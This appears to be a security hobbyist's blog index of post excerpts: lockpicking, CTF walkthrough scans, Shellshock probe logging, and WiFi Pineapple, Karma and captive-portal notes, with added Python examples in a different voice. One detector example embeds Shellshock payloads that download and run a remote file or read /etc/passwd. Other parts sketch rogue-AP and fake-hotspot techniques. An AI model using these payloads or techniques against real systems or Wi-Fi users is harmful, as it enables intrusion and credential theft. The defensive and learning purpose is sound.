Making Keys for locks

Friday, August 11. 2017

One of my hobbies is picking locks. As part of that hobby, I have attended workshops that have taught me various skills for gutting and repinning locks. One of the workshops was at SteelCon and presented by Mad Bob's Lockpicks. MadBob produce some really nice lock picks, so if you haven't heard of them before, check them out. The picks are so much better than my crappy GOSO lock picks that I bought from Amazon.

For SteelCon this year, Scott Helme ran a "Stickers for Charity" stall. MadBob dropped off a bag of locks for the stall, and I purchased a couple. The couple in question didn't have any keys. I thought that would be OK, I could just repin them. Then it dawned on me: I would need a key for that. At that point, I had already purchased the locks.

Blank key and lock

The blank key and the lock before starting anything.

The lock I am going to walk through making a key for is a six-pin lock, branded ERA. Since I didn't have any blank keys, I ordered 10 off eBay and waited the few days for them to arrive. This is far more than I need for this one lock, so I plan to make a bump key as well, and to try making a key purely by impressioning.

Tools Required:

  • Blank Keys

  • Files

  • Follower (A tube the same size as the barrel of the lock)

  • Shims (or a thin piece of metal which goes between the barrel and the lock)

  • Lock Pick (For Single Pin Picking)

  • Sand paper

  • A vise

Pentest Limited's BSides Edinburgh Write up

Thursday, June 1. 2017

This is the second VM that I have tried from Pentest Limited. The report of the Securi-Tay CTF challenge can be found here. As usual, I downloaded the VM (located here) and imported it into VirtualBox. Once I had changed the networking to my local host-only network (vmbox0), I was ready to start taking a closer look. Initially, I did a ping sweep to determine the IP address of the target (nmap's -sP is the old spelling of -sn: host discovery only, no port scan).

# nmap -sP

Starting Nmap 7.40 ( ) at 2017-05-20 22:56 BST
Nmap scan report for
Host is up (0.000065s latency).
MAC Address: 08:00:27:E0:C9:C2 (Oracle VirtualBox virtual NIC)
Nmap scan report for (
Host is up (0.0012s latency).
MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)
Nmap scan report for
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.94 seconds

Once I had the IP address, I then performed a port scan of the main server to reveal a single TCP port open (80 - HTTP):

# nmap -sT

Starting Nmap 7.40 ( ) at 2017-05-20 22:56 BST
Nmap scan report for (
Host is up (0.00066s latency).
Not shown: 999 closed ports
80/tcp open  http
MAC Address: 08:00:27:31:B6:3A (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

So without much delay I fired up a web browser, Burp Suite, Arachni and DirBuster and took a closer look...

PwnLab - Init CTF write up.

Saturday, May 20. 2017

PwnLab-init is a boot2root VM from Vulnhub. The VM and background details can be found here. Once booted, a quick ping sweep via nmap reveals the IP address of the target as, and my attacker (Kali Linux) is on

Running a basic TCP scan of the VM revealed a few services:

# nmap -sT

Starting Nmap 7.40 ( ) at 2017-05-20 21:26 BST
Nmap scan report for
Host is up (0.0032s latency).
Not shown: 997 closed ports
80/tcp   open  http
111/tcp  open  rpcbind
3306/tcp open  mysql
MAC Address: 08:00:27:B8:8C:20 (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 0.27 seconds

For the next part of the recon, I fire up DirBuster to enumerate the web server and see if there is anything interesting on it. I also open a web browser at the index page.

Pentest Limited's SecuriCTF Write up

Saturday, May 20. 2017

From time to time, I get the chance to try some CTF (Capture the Flag) VMs and attempt to get root on them. These are purpose-built VMs that challenge people to break in. For the Securi-Tay 2017 conference, Pentest Limited released a CTF VM, and even though the solution had been posted I decided to give it a go to see how I fared. The VM was aimed at the novice level, so I was in with a chance.

Once the VM was booted in VirtualBox, I was presented with the IP address of the VM on the console screen. In this case my target was My attacking machine (Kali Linux) was sitting on As this is my VirtualBox host-only network, I knew that there shouldn't be anything else on the LAN, so I did a ping sweep with nmap to confirm. The nmap command is

nmap -sP


Keybase on Kali Linux

Wednesday, May 10. 2017
Linux Security

Keybase is a great platform for sharing PGP keys and verifying your identity online. The Linux tools the platform works with, however, don't run on Kali Linux out of the box. The reason is simple: root (UID 0) isn't supported. So how do you overcome this limitation? In my case, my laptop is only used by me, and no one else.

NB: you should be using a dedicated machine to store your private keys. If not, you run the risk of that machine's administrators being able to break into your keys, steal your keystrokes, and so on.

Vulnhub - Fristileaks walkthrough.

Saturday, April 9. 2016

Over at, there are a load of virtual machines ready to be broken, hacked or used as a learning tool. I like a challenge, so I thought I would have a go. All that is required is a suitable VM player, such as VirtualBox. For my first challenge, I chose the Fristileaks VM. The challenge is aimed at a beginner, and is pitched to take around 4 hours.

Once the OVA is downloaded, it is simple to import into VirtualBox. I chose to use Kali Linux for my host machine, which I would also be launching attacks from. I modified the settings of the VM to use a host-only adapter, as I like to have control over what my VMs are doing, especially when I have just downloaded a random VM from the internet, one that is made for hackers no less. Finding out that it did something nasty wouldn't be great, especially as part of the challenge is to have minimal information about the VM before you start.

I also start my VMs headless, so, as I later realised, the DHCP-assigned IP address was sitting on the console waiting for me. The main reason for starting headless is to curb my impatience and not cheat by rooting the VM straight out of the box. So my first task was to identify what IP address the VM had been assigned. Fortunately, this VM responds to ICMP pings (although on a directly connected segment nmap run as root discovers hosts with ARP requests, so the sweep would work even if ICMP were filtered), so discovery was as simple as running:

nmap -sP


Monday, March 2. 2015

"Shellshock" is the name given to a family of six related vulnerabilities in the Bash command shell (CVE-2014-6271 and the follow-up bugs found while patching it) that let an attacker execute commands on Linux and other Unix-like systems by passing a crafted function definition in an environment variable. Details about the vulnerability can be found here (wikipedia).

When running Security Onion (see previous post), I noticed that people were requesting various files on my web server, trying to find a vulnerable one. Being the curious type, this prompted me to ask: what exactly is being requested, can I log it, is there a pattern to the filenames, and what would the malware do if I responded to it?

In order to find out more, I modified my 404 page (a PHP script) to include a file which records the request details for us.
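As an added example (my code, not the post's PHP 404 script, which is not shown here), the following Python scans web-server log lines for the Shellshock signature and pulls out the command the attacker is trying to run. The log lines are constructed for the example; the pattern itself is the real one: CGI exports request headers as environment variables, and unpatched Bash executed whatever followed a "() { ... };" function definition found in any of them.

```python
import re
from typing import Optional

# Apache "combined" log format; the last two quoted fields are Referer and User-Agent.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Unpatched bash treated any environment variable whose value began with "() {"
# as a function definition and kept executing past the closing brace.  A CGI
# server copies request headers into the environment (HTTP_USER_AGENT, ...),
# so the payload arrives in User-Agent, Referer, Cookie, Host, and so on.
MARKER_RE = re.compile(r"\(\s*\)\s*\{")
CMD_RE = re.compile(r"\(\s*\)\s*\{.*?\}\s*;\s*(.*)$", re.DOTALL)


def shellshock_payload(value: str) -> Optional[str]:
    """None if the header value is benign, otherwise the trailing command
    (empty string when the probe has the marker but no command after it)."""
    if not MARKER_RE.search(value):
        return None
    m = CMD_RE.search(value)
    return m.group(1).strip() if m else ""


def scan_log(lines):
    """Return one finding per header that carries a Shellshock payload."""
    findings = []
    for line in lines:
        m = COMBINED_RE.match(line.strip())
        if not m:
            continue  # not a combined-format line; skip rather than crash on it
        for field, name in (("ua", "User-Agent"), ("referer", "Referer")):
            cmd = shellshock_payload(m.group(field))
            if cmd is not None:
                findings.append({
                    "ip": m.group("ip"),
                    "path": m.group("path"),
                    "status": int(m.group("status")),
                    "header": name,
                    "command": cmd,
                })
    return findings


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    # a benign crawler hitting a missing page
    '198.51.100.7 - - [02/Mar/2015:10:11:58 +0000] "GET /robots.txt HTTP/1.1" 404 209 "-" '
    '"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    # classic CVE-2014-6271 probe against a CGI path, payload in User-Agent
    '203.0.113.5 - - [02/Mar/2015:10:12:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 404 209 "-" '
    "\"() { :; }; /bin/bash -c 'wget -O /tmp/x http://203.0.113.99/x; chmod +x /tmp/x; /tmp/x'\"",
    # same trick via Referer; the leading "echo" emits the blank line that ends the CGI headers
    '203.0.113.5 - - [02/Mar/2015:10:12:02 +0000] "GET /cgi-bin/status HTTP/1.1" 404 209 '
    "\"() { :;}; echo; /bin/cat /etc/passwd\" \"curl/7.38.0\"",
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} -> {f['path']} ({f['status']}) via {f['header']}: {f['command']}")
```

Two caveats when using something like this: a 404 handler only sees requests for files that do not exist, so a probe against a CGI script you actually have is logged with a 200 and has to be caught from the access log instead; and a patched Bash simply ignores the function-definition prefix, so seeing the pattern tells you who is scanning, not that they succeeded.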

Security Onion

Thursday, February 26. 2015

The other day, I came across an interesting looking security suite called Security Onion. The author doesn't like the term distro, as it is Ubuntu with extra packages rather than a custom distribution like Kali. The main purpose of the distribution is to provide a quick and easy distributed NSM platform.

NSM, or Network Security Monitoring, is like an IDS. It differs by using multiple sources of information and different analysis tools to find the bad packets. In addition, Security Onion is not meant to be an IPS, so the rule-sets are never "dumbed down". This means you always see the alert, even if you do nothing about it. A false positive on an IPS is bad because it blocks legitimate traffic, so noisy rules get switched off, and that may mean you miss something.

In Security Onion, there are three different types of  deployment, Standalone, Sensor or Server. A Standalone installation contains both a server and one or more sensors. After the break, I'll describe the parts in a bit more detail.


Monday, January 20. 2014

Nodogsplash is a program that creates a captive portal.

Captive portals are the controls / web pages that restrict access to Wi-Fi networks. Modern devices auto-detect captive portals and even prompt you to open the web page. So, combined with Karma on the Pineapple, we now have a device that actively tries to push content to Wi-Fi devices.

One of the basic uses of the wifi pineapple is to "rick-roll" visitors to the site. This doesn't require nodogsplash as the pineapple has a different infusion for that.

So, why use nodogsplash? Well, one reason is to try to emulate free wifi hotspots. With a little bit of grabbing of pages and images, you can make the pineapple look like most other free wifi networks out there. Of course, you can always add your own little bit of code, like a javascript hook...
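As an added example (my code, not nodogsplash's and not from the original post), this Python models both halves of the auto-detection described above: the connectivity probe a device sends as soon as it associates, and the gateway's decision to answer it with a redirect to the splash page. The probe URLs and expected replies are the well-known vendor ones as I know them, stated here as assumptions; the gateway address and client MAC are made up.

```python
from dataclasses import dataclass, field

# Connectivity-check requests common OSes send right after associating, and the
# reply they expect. Assumed values: vendors change hosts and bodies over time.
PROBES = {
    ("connectivitycheck.gstatic.com", "/generate_204"): (204, ""),                    # Android
    ("captive.apple.com", "/hotspot-detect.html"):
        (200, "<HTML><HEAD><TITLE>Success</TITLE></HEAD><BODY>Success</BODY></HTML>"),  # iOS / macOS
    ("www.msftconnecttest.com", "/connecttest.txt"): (200, "Microsoft Connect Test"),  # Windows
}


@dataclass
class Portal:
    """The decision a nodogsplash-style gateway makes for each HTTP request it intercepts."""
    splash_url: str                                   # where the splash page lives (assumed)
    authenticated: set = field(default_factory=set)   # client MACs that have clicked through

    def handle(self, client_mac: str, host: str, path: str):
        """Return (status, headers, body) as the gateway would answer the client."""
        if client_mac not in self.authenticated:
            # Every request from an unknown client, probe or not, is bounced to the splash
            # page. The probe therefore gets a 302 instead of the reply the OS expects,
            # and that mismatch is exactly what makes the "sign in to network" sheet pop up.
            loc = f"{self.splash_url}?redir=http://{host}{path}"
            return 302, {"Location": loc}, ""
        if (host, path) in PROBES:
            # Once authenticated the probe must see the genuine answer, otherwise the OS
            # keeps reporting "no internet" and may drop the network.
            status, body = PROBES[(host, path)]
            return status, {}, body
        return 200, {}, "(forwarded to the real destination)"

    def login(self, client_mac: str) -> None:
        """Called when the client submits the splash form (or just clicks 'accept')."""
        self.authenticated.add(client_mac)


def client_sees_captive_portal(host: str, path: str, status: int, body: str) -> bool:
    """Client-side half: anything other than the expected reply means a portal is in the way."""
    return (status, body) != PROBES[(host, path)]


def walkthrough():
    """One phone associating, being captured, logging in, then getting real connectivity."""
    portal = Portal(splash_url="http://172.16.42.1:2050/splash.html")  # assumed gateway address
    phone = "aa:bb:cc:dd:ee:01"                                          # made-up client MAC
    probe = ("connectivitycheck.gstatic.com", "/generate_204")

    status, headers, body = portal.handle(phone, *probe)
    captured = client_sees_captive_portal(*probe, status, body)  # True: OS opens the splash page

    portal.login(phone)
    status2, _, body2 = portal.handle(phone, *probe)
    released = not client_sees_captive_portal(*probe, status2, body2)
    return captured, headers.get("Location"), released


if __name__ == "__main__":
    captured, location, released = walkthrough()
    print("portal shown:", captured, "->", location)
    print("clear after login:", released)
```

The same mechanism is what makes a fake "free Wi-Fi" portal so effective: the victim does not have to open a browser, the OS does it for them, and whatever the splash page carries (including that JavaScript hook) runs in the sheet the OS opened.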

What is Karma?

Sunday, January 19. 2014
Security Wifi

"KARMA is a set of tools for assessing the security of wireless clients at multiple layers. Wireless sniffing tools discover clients and their preferred/trusted networks by passively listening for 802.11 Probe Request frames. From there, individual clients can be targeted by creating a Rogue AP for one of their probed networks (which they may join automatically) or using a custom driver that responds to probes and association requests for any SSID. Higher-level fake services can then capture credentials or exploit client-side vulnerabilities on the host." -

So, running Karma on your Wi-Fi router allows you to entice users onto your network. Once on your network, the real fun can begin.
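To make the "passively listening for 802.11 Probe Request frames" part concrete, here is an added example (my code, not part of KARMA or of the original post) that decodes probe request frames and builds the client-to-preferred-SSID table a Karma attack starts from. The frames are constructed inside the block: the 24-byte management header and the SSID element follow the 802.11 layout, but there is no FCS and no radiotap header such as a real monitor-mode capture would carry.

```python
import struct

PROBE_REQ_FC0 = 0x40   # frame control byte 0: version 0, type 0 (management), subtype 4 (probe request)
IE_SSID = 0            # element ID of the SSID parameter
IE_SUPPORTED_RATES = 1


def _mac_to_bytes(mac: str) -> bytes:
    return bytes(int(x, 16) for x in mac.split(":"))


def _bytes_to_mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)


def build_probe_request(src_mac: str, ssid: str) -> bytes:
    """Construct a minimal probe request (test data only). Empty ssid = wildcard probe."""
    header = struct.pack("<BBH", PROBE_REQ_FC0, 0x00, 0)   # frame control, duration
    header += b"\xff" * 6                                   # addr1: destination = broadcast
    header += _mac_to_bytes(src_mac)                        # addr2: source = the client
    header += b"\xff" * 6                                   # addr3: BSSID = wildcard
    header += struct.pack("<H", 0)                          # sequence control
    ssid_b = ssid.encode()
    body = bytes([IE_SSID, len(ssid_b)]) + ssid_b
    body += bytes([IE_SUPPORTED_RATES, 8]) + bytes([0x82, 0x84, 0x8B, 0x96, 0x0C, 0x12, 0x18, 0x24])
    return header + body


def parse_probe_request(frame: bytes):
    """Return (source_mac, ssid) for a probe request, ssid None for a wildcard probe;
    None if the frame is too short or is not a probe request at all."""
    if len(frame) < 24 or frame[0] != PROBE_REQ_FC0:
        return None
    src = _bytes_to_mac(frame[10:16])
    body = frame[24:]
    ssid = None
    i = 0
    while i + 2 <= len(body):                 # walk the tagged parameters: id, length, value
        tag, length = body[i], body[i + 1]
        value = body[i + 2:i + 2 + length]
        if len(value) < length:
            break                             # truncated element: stop, do not trust the length byte
        if tag == IE_SSID and length > 0:
            ssid = value.decode("utf-8", errors="replace")
        i += 2 + length
    return src, ssid


def preferred_networks(frames):
    """Map each client MAC to the set of SSIDs it has asked for by name.
    Only directed probes are useful: a wildcard probe names nothing to impersonate."""
    table = {}
    for f in frames:
        parsed = parse_probe_request(f)
        if parsed is None:
            continue
        mac, ssid = parsed
        if ssid is not None:
            table.setdefault(mac, set()).add(ssid)
    return table


# Constructed frames from two made-up clients, plus a beacon that must be ignored.
SAMPLE_FRAMES = [
    build_probe_request("aa:bb:cc:dd:ee:01", "CoffeeShopFreeWifi"),
    build_probe_request("aa:bb:cc:dd:ee:01", "HomeNet"),
    build_probe_request("aa:bb:cc:dd:ee:02", ""),        # wildcard only
    b"\x80\x00" + bytes(22) + bytes(12),                 # beacon (subtype 8), not a probe request
]

if __name__ == "__main__":
    for mac, ssids in preferred_networks(SAMPLE_FRAMES).items():
        print(f"{mac} would auto-join: {', '.join(sorted(ssids))}")
```

In practice the input is a monitor-mode capture rather than hand-built frames. Bear in mind that the table is far thinner today than when Karma was written: current phones mostly send wildcard probes and randomise their MAC while scanning, so the second client above, not the first, is the typical case.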

Wifi Pineapple

Saturday, January 18. 2014
Security Wifi

Over Christmas, I decided to buy a new WiFi Pineapple from Hak5's HakShop. For the uninitiated, the WiFi Pineapple is a tool for pen testing wireless networks.

Essentially, the tool is a Wi-Fi router with twin 802.11 radios, running OpenWrt, supporting Karma and a variety of modules ready to use.

  • CPU: 400 MHz MIPS Atheros AR9331 SoC.

  • Memory: 16 MB ROM, 64 MB DDR2 RAM

  • Disk: Micro SD support up to 32 GB, FAT or EXT, 2 GB Included

  • Mode Select: 5 DIP Switches - 2 System, 3 User configurable

  • Wireless: Atheros AR9331 IEEE 802.11 b/g/n + Realtek RTL8187 IEEE 802.11 a/b/g

  • Ports: (2) SMA Antenna, 10/100 Ethernet, USB 2.0, Micro SD, TTL Serial, Expansion Bus

  • Power: DC in Variable 5-12v, ~1A, 5.5mm*2.1mm connector, International Power Supply

  • Status Indicators: Power LED, Ethernet LED, Wireless 1 LED, Wireless 2 LED